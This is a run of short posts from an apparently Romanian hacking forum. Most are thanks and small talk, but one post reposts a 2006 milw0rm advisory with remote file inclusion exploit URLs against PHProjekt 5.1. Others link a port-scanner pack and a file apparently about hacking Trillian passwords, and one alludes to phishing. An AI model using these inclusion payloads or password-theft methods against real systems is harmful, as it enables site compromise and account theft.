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  1. As vrea si eu unul cu Razor si RST pe fundal verde si cu fontul din avataru lui edededi (ala unde scrie RST).
  2. Very nice share man! Thanks alot
  3. bune pt. colectie. Nice share
  4. <div class='quotetop'>QUOTE("Nemessis")</div> Nu are legatura nici cu una nici cu cealalta. Suntem pescari. Iti spune ceva cuvantul asta? [/quote:e003f7c122] phishing mda. nice share
  5. /* +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + -  - - [DEVIL TEAM THE BEST POLISH TEAM] - - + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - [Script name: PHProjekt v. 5.1 - [Script site: [url]http://www.phprojekt.com/[/url] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + -      Find by: Kacper (a.k.a Rahim) + -      Contact: [email]kacper1964@yahoo.pl[/email] -             or -      [url]http://www.devilteam.yum.pl[/url] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Greetz: DragonHeart - and all DEVIL TEAM Members + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + -       Z Dedykacja dla osoby, -     bez ktorej nie mogl bym zyc... -      K.C:* J.M (a.k.a Magaja) + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ #Expl: [url]http://www.site.com/[/url][PHProjekt_path]/lib/dbman_filter.inc.php?lib_path=[evil_scripts] [url]http://www.site.com/[/url][PHProjekt_path]/lib/specialdays.php?path_pre=[evil_scripts] #Pozdro dla wszystkich;-) # milw0rm.com [2006-08-15]
  6. O sa-l incerc si eu. 10x
  7. <div class='quotetop'>QUOTE("AnON|m")</div> Mda... avand in vedere astea si altele cred ca e viu
  8. http://rapidshare.de/files/29865581/Scanners.rar.html Scanners pack: THC-AMAP Amap is a next-generation scanning tool, which identifies applications and services even if they are not listening on the default port SuperScan SuperScan is a completely-rewritten update of the highly popular Windows port scanning, pinger, resolver tool, SuperScan Nmap 4.1.1 For win32 and linux Nessus For win32 and linux Winscan Wingate scanner AngryIPScan Fast port scanner Languard Port scanner and network scanner Port Spy Port listener
  9. Very nice 10x
  10. Folosesc NOD 32 dar si Kaspersky este bun doar ca mananca resurse. Compare your Antivirus to NOD32 http://www.eset.com/products/compare-NOD32...competition.php http://www.eset.com/products/compare.php
  11. Razor

    nos si IRC-ul

    Daca nu aveti cont de e-mail de la isp si nu va merge incercati cu asta www.the-quickest.com
  12. buna idee
  13. nice 10x alot
  14. http://rapidshare.de/files/28625757/Trilian_pass_hack.txt.html L-am uploadat pt ca nu mergea pus direct.
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